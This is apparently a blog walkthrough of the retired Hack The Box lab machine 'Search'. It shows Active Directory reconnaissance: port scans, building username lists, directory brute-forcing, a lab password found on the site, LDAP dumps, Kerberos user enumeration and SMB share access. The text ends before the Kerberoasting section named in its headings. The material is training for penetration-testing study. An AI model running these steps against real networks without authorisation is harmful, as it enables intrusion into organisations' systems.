Grav3m1ndbyte's Blog
HTB Machine and Challenge Walkthroughs
HTB: Retired Boxes
HTB: Retired Challenges
- Lernaean
OSCP Study Material
- 😁Learning SQL Injection in Oracle Databases
Useful Scripts and Others
About Me
Contact Me

On this page

Overview
References
Enumeration
Enumerating HTTP/HTTPS
Enumerating LDAP
Using Kerbrute and Enum4linux
Gaining Access
Kerberoasting
Privilege Escalation
Bloodhound
Lateral Movement

Was this helpful?

HTB: Retired Boxes

Search

Completed on April 23, 2022.

PreviousIntelligence NextStreamIO

Last updated 2 years ago

Was this helpful?

On this page

Overview
References
Enumeration
Enumerating HTTP/HTTPS
Enumerating LDAP
Using Kerbrute and Enum4linux
Gaining Access
Kerberoasting
Privilege Escalation
Bloodhound
Lateral Movement

Was this helpful?

HTB: Retired Boxes

Search

Completed on April 23, 2022.

Overview

Hopefully you like this machine as much as I did. When I worked on it, I was getting ready to start working on the OSCP training (PEN-200), and was looking for practice before starting. At this point, I had finished the eCPPT almost month ago. As almost all the HTB machines, this one goes a bit overboard so it is definitely a good practice in my opinion. It requires a thorough enumeration more than the techniques used to pwn the system. The references I share below should help out understanding what is involved.

References

Enumeration

As we need to know what is available to us, we need to enumerate the exposed services to get some initial information and then dig deeper. Let's start by finding open ports…

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ sudo nmap -Pn -sS -p- --min-rate=1000 -T4 search.htb -oN Search_openPorts.log -oX Search_openPorts.xml
[sudo] password for jxberrios: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-19 22:07 EDT
Nmap scan report for search.htb (10.129.96.123)
Host is up (0.041s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
443/tcp   open  https
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
8172/tcp  open  unknown
9389/tcp  open  adws
49666/tcp open  unknown
49693/tcp open  unknown
49694/tcp open  unknown
49710/tcp open  unknown
49724/tcp open  unknown
49754/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 124.97 seconds

…followed by further port scanning:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ PORTS=$(cat Search_openPorts.log | grep -E 'tcp.*open' | cut -d '/' -f 1 | xargs | sed -e 's/ /,/g')
                                                                                   
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ sudo nmap -Pn -sS -sC -sV -p $PORTS --min-rate=1000 -T4 search.htb -oN Search_PortScan.log -oX Search_PortScan.xml
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-19 22:21 EDT
Nmap scan report for search.htb (10.129.96.123)
Host is up (0.040s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Search &mdash; Just Testing IIS
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-04-20 02:20:43Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_ssl-date: 2022-04-20T02:22:12+00:00; -1m23s from scanner time.
443/tcp   open  ssl/http      Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
| http-methods: 
|_  Potentially risky methods: TRACE
| tls-alpn: 
|_  http/1.1
|_http-title: Search &mdash; Just Testing IIS
|_ssl-date: 2022-04-20T02:22:12+00:00; -1m23s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_ssl-date: 2022-04-20T02:22:12+00:00; -1m23s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_ssl-date: 2022-04-20T02:22:12+00:00; -1m23s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_ssl-date: 2022-04-20T02:22:12+00:00; -1m23s from scanner time.
8172/tcp  open  ssl/http      Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_ssl-date: 2022-04-20T02:22:12+00:00; -1m23s from scanner time.
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=WMSvc-SHA2-RESEARCH
| Not valid before: 2020-04-07T09:05:25
|_Not valid after:  2030-04-05T09:05:25
|_http-title: Site doesn't have a title.
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49693/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49694/tcp open  msrpc         Microsoft Windows RPC
49710/tcp open  msrpc         Microsoft Windows RPC
49724/tcp open  msrpc         Microsoft Windows RPC
49754/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-04-20T02:21:36
|_  start_date: N/A
|_clock-skew: mean: -1m23s, deviation: 0s, median: -1m23s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.96 seconds

From the port scan we have lot of good information to start with. What we know so far is:

Domain: search.htb
Command Name: research

Enumerating HTTP/HTTPS

Inspecting TCP80 leads to a static page and references to jpg files:

Doing the same on TCP443 leads to the same page but there is a certificate bound to the service and the hostname research.search.htb associated with the certificate. This is the hostname related to the common name found in some services:

Note: Adding the CN research.search.htb to the hosts file.

As both http and https sites reference the same application, we find some “employees” that might come in handy:

For the sake of clarifying, exposing a web application on HTTP when it is supposed to on on HTTPS is not something that should not be done for security reasons. Pulling a list of employees to then create a username combination:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ curl -sLkX GET --url "http://search.htb/#team-section" | grep -E '.*<h3>.*<\/h3>' | head -n 8 | tr -s ' ' | sed 's/^\s//' | sed 's/[/<>h3]//g'
Keely Lyons
Dax Santiago
Sierra Frye
Kyla Stewart
Kaiara Spencer
Dave Simpson
Ben Tompson
Cris Stewart

With these names we can build a list of common usernames based on typical naming conventions. See below if desired.

Username Combination

KLyons
DSantiago
SFrye
KStewart
KSpencer
DSimpson
BTompson
CStewart
K.Lyons
D.Santiago
S.Frye
K.Stewart
K.Spencer
D.Simpson
B.Tompson
C.Stewart
Keely.Lyons
Dax.Santiago
Sierra.Frye
Kyla.Stewart
Kaiara.Spencer
Dave.Simpson
Ben.Tompson
Cris.Stewart

As part of our enumeration on HTTP/HTTPS, let's enumerate directories:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ dirb http://research.search.htb/ /opt/seclists/Discovery/Web-Content/common.txt -t -l -N 401,403,404 -w -f

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Apr 22 19:27:21 2022
URL_BASE: http://research.search.htb/
WORDLIST_FILES: /opt/seclists/Discovery/Web-Content/common.txt
OPTION: Fine tunning of NOT_FOUND detection
OPTION: Printing LOCATION header
OPTION: Ignoring NOT_FOUND code -> 401
OPTION: NOT forcing an ending '/' on URLs
OPTION: Not Stopping on warning messages

-----------------

GENERATED WORDS: 4710                                                          

---- Scanning URL: http://research.search.htb/ ----
==> DIRECTORY: http://research.search.htb/Images/                                 
==> DIRECTORY: http://research.search.htb/certenroll/                             
==> DIRECTORY: http://research.search.htb/css/                                    
==> DIRECTORY: http://research.search.htb/fonts/                                  
==> DIRECTORY: http://research.search.htb/images/                                 
+ http://research.search.htb/index.html (CODE:200|SIZE:2968)                      
==> DIRECTORY: http://research.search.htb/js/                                     
+ http://research.search.htb/staff (CODE:403|SIZE:1233)                           
                                                                                  
---- Entering directory: http://research.search.htb/Images/ ----
                                                                                  
---- Entering directory: http://research.search.htb/certenroll/ ----
                                                                                  
---- Entering directory: http://research.search.htb/css/ ----
                                                                                  
---- Entering directory: http://research.search.htb/fonts/ ----
                                                                                  
---- Entering directory: http://research.search.htb/images/ ----
                                                                                  
---- Entering directory: http://research.search.htb/js/ ----
                                                                                  
-----------------
END_TIME: Fri Apr 22 19:54:26 2022
DOWNLOADED: 32970 - FOUND: 2

From the directory/page enumeration, it is worth noting there is a ’certificate enrollment’ directory and most probably this is a user certificate enrollment service, but at the moment the key question is what is it for? While inspecting thoroughly, we found a picture with some notes and when we inspected the notes it had a message giving out a clue:

Looking suspicious enough to look into this user and what seems to be its password. Given our naming convention first.last, we can compose it as:

Hope Sharp -> hope.sharp
Password: 'IsolationIsKey?'

Enumerating LDAP

Regardless of having some potential access, we should try and enumerate LDAP with no credentials if we are looking to do an assessment, and even when the service asks for authentication, some good info can still be retrieved.

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ ldapsearch -x -H ldap://search.htb:389 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingcontexts: DC=search,DC=htb
namingcontexts: CN=Configuration,DC=search,DC=htb
namingcontexts: CN=Schema,CN=Configuration,DC=search,DC=htb
namingcontexts: DC=DomainDnsZones,DC=search,DC=htb
namingcontexts: DC=ForestDnsZones,DC=search,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ ldapsearch -x -H ldap://search.htb:389 -b "DC=search,DC=htb" -s one       
# extended LDIF
#
# LDAPv3
# base <DC=search,DC=htb> with scope oneLevel
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4563

# numResponses: 1

We can retrieve the naming contexts but anything else requires authentication. Use ldapsearch against the Users base Object to test credentials:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ ldapsearch -x -H ldap://search.htb:389 -D 'SEARCH\hope.sharp' -w 'IsolationIsKey?' -b 'CN=Users,DC=search,DC=htb' 'objectClass=user'   
# extended LDIF
#
# LDAPv3
# base <CN=Users,DC=search,DC=htb> with scope subtree
# filter: objectClass=user
# requesting: ALL
#

# Administrator, Users, search.htb
dn: CN=Administrator,CN=Users,DC=search,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Administrator
description: Built-in account for administering the computer/domain
userCertificate:: MIIF2jCCBMKgAwIBAgITVAAAAAVaQrAT7+sADQAAAAAABTANBgkqhkiG9w0B
 AQsFADBKMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VhcmNoMRswGQYDV
 QQDExJzZWFyY2gtUkVTRUFSQ0gtQ0EwHhcNMjAwNDA3MTEyMzA5WhcNMjEwNDA3MTEyMzA5WjBVMR
 MwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VhcmNoMQ4wDAYDVQQDEwVVc2V
 yczEWMBQGA1UEAxMNQWRtaW5pc3RyYXRvcjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
 ALmINUCLzjvz8M7ZYeAecIw1ZF0dLJDnseKfI3BMM4rxu7G7hJ8kL5HmcxFWINzLWCO5bKNyYtLGq
 H6Cb9FsSezc6tW/z22rXkt5Qho0DgBlgRNvFLhmHonviwk2RPXO3gHcjBL/4WDTMjPi38739CtP6l
 oRPqrEephRE8CRMQUaGDbUTC2Xs1/Z0LPwVdemV8Nwm3O00MdsFMbCWn/hty3Hxo5ZMTqKsnz+Wml
 PqVwdkEKBe1k9tKVD8qpC6cQpIbm3qdobFzaLkHamIf2Bvo+/Uy2OvSOifMw1mGJJwbeLeT1kDsVI
 pP0gGh6ZdiaZSRhIXGE7DqrFISzi3TRRcoECAwEAAaOCAqwwggKoMBcGCSsGAQQBgjcUAgQKHggAV
 QBzAGUAcjApBgNVHSUEIjAgBgorBgEEAYI3CgMEBggrBgEFBQcDBAYIKwYBBQUHAwIwDgYDVR0PAQ
 H/BAQDAgWgMEQGCSqGSIb3DQEJDwQ3MDUwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQMEAgIAgDA
 HBgUrDgMCBzAKBggqhkiG9w0DBzAdBgNVHQ4EFgQUar7IemvyH1eMJoKVYsu98hlqNtcwHwYDVR0j
 BBgwFoAUapGteyhvtUimWzjOvGKqX+dX7FAwgdAGA1UdHwSByDCBxTCBwqCBv6CBvIaBuWxkYXA6L
 y8vQ049c2VhcmNoLVJFU0VBUkNILUNBLENOPVJlc2VhcmNoLENOPUNEUCxDTj1QdWJsaWMlMjBLZX
 klMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPXNlYXJjaCxEQz1odGI
 /Y2VydGlmaWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlv
 blBvaW50MIHDBggrBgEFBQcBAQSBtjCBszCBsAYIKwYBBQUHMAKGgaNsZGFwOi8vL0NOPXNlYXJja
 C1SRVNFQVJDSC1DQSxDTj1BSUEsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZX
 MsQ049Q29uZmlndXJhdGlvbixEQz1zZWFyY2gsREM9aHRiP2NBQ2VydGlmaWNhdGU/YmFzZT9vYmp
 lY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0aG9yaXR5MDMGA1UdEQQsMCqgKAYKKwYBBAGCNxQCA6Aa
 DBhBZG1pbmlzdHJhdG9yQHNlYXJjaC5odGIwDQYJKoZIhvcNAQELBQADggEBAILhtyleim0/vZoXl
 JMgBxLEeNZ63bsint0+6IvP+yTBA4ISqoGLYIsDyOoYdecpykjyjUrQusxqwJBslyYONQ7YBgEzmW
 Db9vlnqUCVWiN1fEtTHUkYzts0oUORVMOHQqpT4P0ktbrupngFClgw/F8n4LDNw7+QuudaKx7hX/J
 bO61uwS7YZ1ycQPlApAOoxWgY8UsBh0X0aEfwBDTN4/6+1O7ur9HVPx3NkdPNcjmBkm8XmPqhf2nM
 ydESLU+jwZGmrCxFThJFuYLSGpKQzKMeFbVC7NlIx/bDlScKjEZ+0rvxKr/d5d24LIQChXLxLUnWg
 FdrY2mB8twsL2Z5z80=
userCertificate:: MIIF2jCCBMKgAwIBAgITVAAAAAS4VoSkRjxsHQAAAAAABDANBgkqhkiG9w0B
 AQsFADBKMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VhcmNoMRswGQYDV
 QQDExJzZWFyY2gtUkVTRUFSQ0gtQ0EwHhcNMjAwNDA3MTExNzEwWhcNMjEwNDA3MTExNzEwWjBVMR
 MwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VhcmNoMQ4wDAYDVQQDEwVVc2V
 yczEWMBQGA1UEAxMNQWRtaW5pc3RyYXRvcjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
 AN63rj3DSVXg22+lcsAoqCNVMCWxRG/hzxsIFZUQY5aWQdno2CyYbY+i/om5J7Q7xjTSqU0u3btbb
 AYmG/yD1WdpaELFmjeJ8fM+Jk74eeAZjO8zzxtCGhPKa9a4XbDw3QVZNm0YIOCrTr+qpO7s/Dhp/Q
 LWvzLD/sVWl/0TzxjT3dmBWTDK5ezYt0lakVu8DhMT/QuTZxlb/NIYD1OqScl4M3xoIJoTDeSgBUg
 K/YdfAOICxrm7CrJLj22WcnocDj+hDvPDW8eh2Z2KJLbbkytNPEEfz3g0MKuUfONvNK6Xq60JfaN4
 +5gfsSFTmfcRqd4qmWGehcM9UVgSOPdnfzECAwEAAaOCAqwwggKoMBcGCSsGAQQBgjcUAgQKHggAV
 QBzAGUAcjApBgNVHSUEIjAgBgorBgEEAYI3CgMEBggrBgEFBQcDBAYIKwYBBQUHAwIwDgYDVR0PAQ
 H/BAQDAgWgMEQGCSqGSIb3DQEJDwQ3MDUwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQMEAgIAgDA
 HBgUrDgMCBzAKBggqhkiG9w0DBzAdBgNVHQ4EFgQU10U6bi0rwCTCoxT09cJR0AbQL1UwHwYDVR0j
 BBgwFoAUapGteyhvtUimWzjOvGKqX+dX7FAwgdAGA1UdHwSByDCBxTCBwqCBv6CBvIaBuWxkYXA6L
 y8vQ049c2VhcmNoLVJFU0VBUkNILUNBLENOPVJlc2VhcmNoLENOPUNEUCxDTj1QdWJsaWMlMjBLZX
 klMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPXNlYXJjaCxEQz1odGI
 /Y2VydGlmaWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlv
 blBvaW50MIHDBggrBgEFBQcBAQSBtjCBszCBsAYIKwYBBQUHMAKGgaNsZGFwOi8vL0NOPXNlYXJja
 C1SRVNFQVJDSC1DQSxDTj1BSUEsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZX
 MsQ049Q29uZmlndXJhdGlvbixEQz1zZWFyY2gsREM9aHRiP2NBQ2VydGlmaWNhdGU/YmFzZT9vYmp
 lY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0aG9yaXR5MDMGA1UdEQQsMCqgKAYKKwYBBAGCNxQCA6Aa
 DBhBZG1pbmlzdHJhdG9yQHNlYXJjaC5odGIwDQYJKoZIhvcNAQELBQADggEBAIGN30BMcH57jgTPU
 iy8VNNDZ6ykF4VMke5mrO3W+kOjW0U8AuowVlBIng1HhWGSNgBEvacFlA1sEnC3cTAVag57eH4Ov7
 uRgBtZ3h9AO2CKm1RtvVvqjXLP4wmOk7cTBocV3RwuT+CoDFzPRa+9ZD5HRQMPUgshYgBPz96G8t3
 USFTnI8jePGBF9uDUy19ujpw2gGlh9JkEvCTeR8FNvjPljRsw4DM8sJrOd5RJm6p1NTx/uCodIgGr
 qKgKQMRKLVOQ8l5NMUDXsc1ozclpiiHCH6foanyZWU2ZJ/hacXCMq2B18gwknwAxn6Ai1CEa3PzoV
 YROF/I4JvNfy1XL8DQ=
distinguishedName: CN=Administrator,CN=Users,DC=search,DC=htb
instanceType: 4
whenCreated: 20200331141835.0Z
whenChanged: 20220413105646.0Z
uSNCreated: 8196
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=search,DC=htb
memberOf: CN=Domain Admins,CN=Users,DC=search,DC=htb
memberOf: CN=Enterprise Admins,CN=Users,DC=search,DC=htb
memberOf: CN=Schema Admins,CN=Users,DC=search,DC=htb
memberOf: CN=Administrators,CN=Builtin,DC=search,DC=htb
uSNChanged: 213062
name: Administrator
objectGUID:: pc4v2f1XX0OmXLqrv/Edgw==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132943234160414333
lastLogoff: 0
lastLogon: 132951144927723973
pwdLastSet: 132313451094143670
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAtaYuEIEY/l8B9o1v9AEAAA==
adminCount: 1
accountExpires: 9223372036854775807
logonCount: 866
sAMAccountName: Administrator
sAMAccountType: 805306368
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=search,DC=htb
isCriticalSystemObject: TRUE
dSCorePropagationData: 20200407065434.0Z
dSCorePropagationData: 20200331143446.0Z
dSCorePropagationData: 20200331143446.0Z
dSCorePropagationData: 20200331141936.0Z
dSCorePropagationData: 16010714042016.0Z
lastLogonTimestamp: 132943210066516943
msDS-SupportedEncryptionTypes: 0

# Guest, Users, search.htb
dn: CN=Guest,CN=Users,DC=search,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Guest
description: Built-in account for guest access to the computer/domain
distinguishedName: CN=Guest,CN=Users,DC=search,DC=htb
instanceType: 4
whenCreated: 20200331141835.0Z
whenChanged: 20200331141835.0Z
uSNCreated: 8197
memberOf: CN=Guests,CN=Builtin,DC=search,DC=htb
uSNChanged: 8197
name: Guest
objectGUID:: ulsgEdc6F0mO1JMHdczXCA==
userAccountControl: 66082
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 0
primaryGroupID: 514
objectSid:: AQUAAAAAAAUVAAAAtaYuEIEY/l8B9o1v9QEAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: Guest
sAMAccountType: 805306368
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=search,DC=htb
isCriticalSystemObject: TRUE
dSCorePropagationData: 20200407065434.0Z
dSCorePropagationData: 20200331141936.0Z
dSCorePropagationData: 16010101000417.0Z

# krbtgt, Users, search.htb
dn: CN=krbtgt,CN=Users,DC=search,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: krbtgt
description: Key Distribution Center Service Account
distinguishedName: CN=krbtgt,CN=Users,DC=search,DC=htb
instanceType: 4
whenCreated: 20200331141936.0Z
whenChanged: 20211214201649.0Z
uSNCreated: 12324
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=search,DC=htb
uSNChanged: 180281
showInAdvancedViewOnly: TRUE
name: krbtgt
objectGUID:: aZ2LlY6VY0igOk+ajvf3mg==
userAccountControl: 66050
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 132301379764357878
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAtaYuEIEY/l8B9o1v9gEAAA==
adminCount: 1
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: krbtgt
sAMAccountType: 805306368
servicePrincipalName: kadmin/changepw
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=search,DC=htb
isCriticalSystemObject: TRUE
dSCorePropagationData: 20200407065434.0Z
dSCorePropagationData: 20200331143446.0Z
dSCorePropagationData: 20200331141936.0Z
dSCorePropagationData: 16010101181216.0Z
msDS-SupportedEncryptionTypes: 0

# Tristan Davies, Users, search.htb
dn: CN=Tristan Davies,CN=Users,DC=search,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Tristan Davies
sn: Davies
description: The only Domain Admin allowed, Administrator will soon be disable
 d
givenName: Tristan
distinguishedName: CN=Tristan Davies,CN=Users,DC=search,DC=htb
instanceType: 4
whenCreated: 20200408163602.0Z
whenChanged: 20220422144632.0Z
displayName: Tristan Davies
uSNCreated: 24817
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=search,DC=htb
memberOf: CN=Domain Admins,CN=Users,DC=search,DC=htb
memberOf: CN=Enterprise Admins,CN=Users,DC=search,DC=htb
memberOf: CN=Schema Admins,CN=Users,DC=search,DC=htb
memberOf: CN=Administrators,CN=Builtin,DC=search,DC=htb
uSNChanged: 253025
name: Tristan Davies
objectGUID:: BG7UG1fgykOF22w51h8LBw==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132406600358324634
lastLogoff: 0
lastLogon: 132406781797503096
pwdLastSet: 132427526509705890
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAtaYuEIEY/l8B9o1vEgUAAA==
adminCount: 1
accountExpires: 9223372036854775807
logonCount: 4
sAMAccountName: Tristan.Davies
sAMAccountType: 805306368
userPrincipalName: Tristan.Davies@search.htb
lockoutTime: 0
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=search,DC=htb
dSCorePropagationData: 20220422152132.0Z
dSCorePropagationData: 20220422151632.0Z
dSCorePropagationData: 20220422151132.0Z
dSCorePropagationData: 20220422150632.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 132416141844196476

# search result
search: 2
result: 0 Success

# numResponses: 5
# numEntries: 4

Along with some users, we can see user certificate information from the Administrator user.

Using Kerbrute and Enum4linux

Using the username list we created from the people found on the web application, we can try and confirm if those are valid users.

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ kerbrute userenum --dc search.htb -d search.htb usernames.txt 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (n/a) - 04/21/22 - Ronnie Flathers @ropnop

2022/04/21 00:55:41 >  Using KDC(s):
2022/04/21 00:55:41 >  	search.htb:88

2022/04/21 00:55:41 >  [+] VALID USERNAME:	 Keely.Lyons@search.htb
2022/04/21 00:55:41 >  [+] VALID USERNAME:	 Sierra.Frye@search.htb
2022/04/21 00:55:41 >  [+] VALID USERNAME:	 Dax.Santiago@search.htb
2022/04/21 00:55:42 >  Done! Tested 24 usernames (3 valid) in 0.374 seconds

This gave us three AD accounts that exist. By using enum4linux, we found some interesting group memberships and other users retrieved through LDAP:

Group: 'Schema Admins' (RID: 518) has member: SEARCH\Administrator
Group: 'Schema Admins' (RID: 518) has member: SEARCH\Tristan.Davies
Group: 'Domain Admins' (RID: 512) has member: SEARCH\Administrator
Group: 'Domain Admins' (RID: 512) has member: SEARCH\Tristan.Davies
Group: 'Group Policy Creator Owners' (RID: 520) has member: SEARCH\Administrator
Group: 'Group Policy Creator Owners' (RID: 520) has member: SEARCH\Tristan.Davies

At this point, we could pull more information valuable using Bloodhound and might save us some effort, but we can leave for a later stage so we go through the process.

Gaining Access

Looking specifically at the shares this account has access to:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ smbmap -H search.htb -u 'hope.sharp' -p 'IsolationIsKey?' -d SEARCH 
[+] IP: search.htb:445	Name: unknown                                           
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	CertEnroll                                        	READ ONLY	Active Directory Certificate Services share
	helpdesk                                          	NO ACCESS	
	IPC$                                              	READ ONLY	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	RedirectedFolders$                                	READ, WRITE	
	SYSVOL                                            	READ ONLY	Logon server share

There we see there is a share that can be accessed with this credential. Let's take a look:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ smbclient //search.htb/RedirectedFolders$ -U 'SEARCH\hope.sharp'%'IsolationIsKey?'
Try "help" to get a list of possible commands.
smb: \> recurse 
smb: \> ls
  .                                  Dc        0  Fri Apr 22 11:47:28 2022
  ..                                 Dc        0  Fri Apr 22 11:47:28 2022
  abril.suarez                       Dc        0  Tue Apr  7 14:12:58 2020
  Angie.Duffy                        Dc        0  Fri Jul 31 09:11:32 2020
  Antony.Russo                       Dc        0  Fri Jul 31 08:35:32 2020
  belen.compton                      Dc        0  Tue Apr  7 14:32:31 2020
  Cameron.Melendez                   Dc        0  Fri Jul 31 08:37:36 2020
  chanel.bell                        Dc        0  Tue Apr  7 14:15:09 2020
  Claudia.Pugh                       Dc        0  Fri Jul 31 09:09:08 2020
  Cortez.Hickman                     Dc        0  Fri Jul 31 08:02:04 2020
  dax.santiago                       Dc        0  Tue Apr  7 14:20:08 2020
  Eddie.Stevens                      Dc        0  Fri Jul 31 07:55:34 2020
  edgar.jacobs                       Dc        0  Thu Apr  9 16:04:11 2020
  Edith.Walls                        Dc        0  Fri Jul 31 08:39:50 2020
  eve.galvan                         Dc        0  Tue Apr  7 14:23:13 2020
  frederick.cuevas                   Dc        0  Tue Apr  7 14:29:22 2020
  hope.sharp                         Dc        0  Thu Apr  9 10:34:41 2020
  jayla.roberts                      Dc        0  Tue Apr  7 14:07:00 2020
  Jordan.Gregory                     Dc        0  Fri Jul 31 09:01:06 2020
  payton.harmon                      Dc        0  Thu Apr  9 16:11:39 2020
  Reginald.Morton                    Dc        0  Fri Jul 31 07:44:32 2020
  santino.benjamin                   Dc        0  Tue Apr  7 14:10:25 2020
  Savanah.Velazquez                  Dc        0  Fri Jul 31 08:21:42 2020
  sierra.frye                        Dc        0  Wed Nov 17 20:01:46 2021
  trace.ryan                         Dc        0  Thu Apr  9 16:14:26 2020

\abril.suarez
  .                                  Dc        0  Tue Apr  7 14:12:58 2020
  ..                                 Dc        0  Tue Apr  7 14:12:58 2020
  Desktop                           DRc        0  Fri Jul 31 08:19:29 2020
  Documents                         DRc        0  Fri Jul 31 08:19:33 2020
  Downloads                         DRc        0  Fri Jul 31 08:19:30 2020

...

\frederick.cuevas\Downloads
NT_STATUS_ACCESS_DENIED listing \frederick.cuevas\Downloads\*

